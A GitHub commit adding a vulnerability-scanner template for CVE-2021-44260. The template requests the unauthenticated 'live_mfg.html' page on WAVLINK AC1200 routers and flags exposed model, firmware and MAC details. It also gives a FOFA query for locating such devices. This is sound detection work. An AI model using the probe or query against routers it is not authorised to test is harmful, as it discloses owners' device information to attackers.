Create CVE-2021-44260.yaml

patch-14
Ritik Chaddha 2024-11-06 23:25:16 +05:30 committed by GitHub
parent 0322f968eb
commit ec90220a98
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: CVE-2021-44260
info:
name: WAVLINK AC1200 - Information Disclosure
author: ritikchaddha
severity: high
description: |
A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.
impact: |
Successful exploitation could lead to sensitive information disclosure.
reference:
- https://github.com/zer0yu/CVE_Request/blob/master/WAVLINK/WAVLINK_AC1200_unauthorized_access_vulnerability_first.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-44260
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-44260
cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:a42w-1.27.6-20180418:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wavlink
product: wl-wn531g3_firmware
fofa-query: body="AC1200" && body="wavlink"
tags: cve,cve2022,wavlink,exposure,ac1200
http:
- method: GET
path:
- "{{BaseURL}}/live_mfg.html"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Model=", "FW_Version=", "LAN_MAC=", "Brand=")'
- 'status_code == 200'
condition: and